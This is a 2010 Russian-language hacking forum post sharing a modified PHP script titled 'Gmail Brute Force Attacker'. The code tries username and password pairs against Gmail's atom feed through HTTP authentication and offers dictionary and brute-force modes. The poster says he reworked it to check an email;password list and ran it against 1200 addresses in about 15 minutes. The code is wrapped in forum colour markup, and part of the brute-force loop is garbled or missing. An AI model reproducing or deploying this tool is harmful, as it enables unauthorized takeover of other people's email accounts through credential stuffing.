Тема: LARIKA Gmail Brute Forcer [PHP]
Показать сообщение отдельно

  #13  
Старый 21.09.2010, 01:44
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Подправил, чтоб перебирал по списку email;pass, просканил 1200 адресов минут за 15

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]Gmail Brute Force Attacker

body {

font:Verdana, Arial, Helvetica, sans-serif;

font-size:12px;

border-color:#FFFFFF;

}

.raster_table {

background-color:#444444;

border-color:#CCCCCC;

}

.alert {

 color:#FF0000;

}

Gmail Brute Force Attacker























 













Username to brute:

-















 





"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]// Sets variables and retrives google error for comparing

[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'attack'[/COLOR][COLOR="#007700"]]) && isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]= array(

[/COLOR][COLOR="#DD0000"]"Host: mail.google.com"[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]"Accept-Language: en-us,en;q=0.5"[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]"Accept-Encoding: text"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#FF8000"]# No gzip, it only clutters your code!

[/COLOR][COLOR="#DD0000"]"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]"Date: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DATE_RFC822[/COLOR][COLOR="#007700"])

 );

[/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'https://mail.google.com/mail/feed/atom'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPAUTH[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLAUTH_ANY[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// use authentication

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPHEADER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// send the headers

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// We need to fetch something from a string, so no direct output!

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_FOLLOWLOCATION[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// we get redirected, so follow

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYPEER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYHOST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_UNRESTRICTED_AUTH[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// always stay authorised

[/COLOR][COLOR="#0000BB"]$wrong[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// Get it

[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// Close the curl stream

[/COLOR][COLOR="#007700"]}

[/COLOR][COLOR="#FF8000"]//Dictionary Attack

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'attack'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"dictionary"[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$Dictionary[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dic[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);

 do {

[/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$Dictionary[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$pair[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"@"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pair[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

 if([/COLOR][COLOR="#0000BB"]check_correct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$pair[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]])) {

 print([/COLOR][COLOR="#DD0000"]"





"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"@"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pair[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"





"[/COLOR][COLOR="#007700"]);

 }

 } while (![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$Dictionary[/COLOR][COLOR="#007700"]));

 echo[/COLOR][COLOR="#DD0000"]"





Sorry... a password was not found for the account of "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" during the dictionar

y attack.





"[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#FF8000"]//Brute Attack

[/COLOR][COLOR="#007700"]elseif([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'attack'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"brute"[/COLOR][COLOR="#007700"]) {

 for ([/COLOR][COLOR="#0000BB"]$Pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$Pass[/COLOR][COLOR="#007700"]



Found the password of: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$Dictionary[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$Position[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"
 For the account: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"



"[/COLOR][COLOR="#007700"]);

 }

 }

 echo[/COLOR][COLOR="#DD0000"]"





Sorry... a password was not found for the account of "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" during the brute for

ce attack.





"[/COLOR][COLOR="#007700"];

}

echo[/COLOR][COLOR="#DD0000"]"

"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]// Function for checking whether the username and password are correct

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]check_correct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"])

{

 global[/COLOR][COLOR="#0000BB"]$wrong[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'https://'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]':'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'@mail.google.com/mail/feed/atom'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPAUTH[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLAUTH_ANY[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// use authentication

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPHEADER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// send the headers

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// We need to fetch something from a string, so no direct output!

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_FOLLOWLOCATION[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// we get redirected, so follow

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYPEER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYHOST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_UNRESTRICTED_AUTH[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// always stay authorised

[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// Get it

[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$wrong[/COLOR][COLOR="#007700"]) {return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];}

 else {return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];}

}

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
 
Ответить с цитированием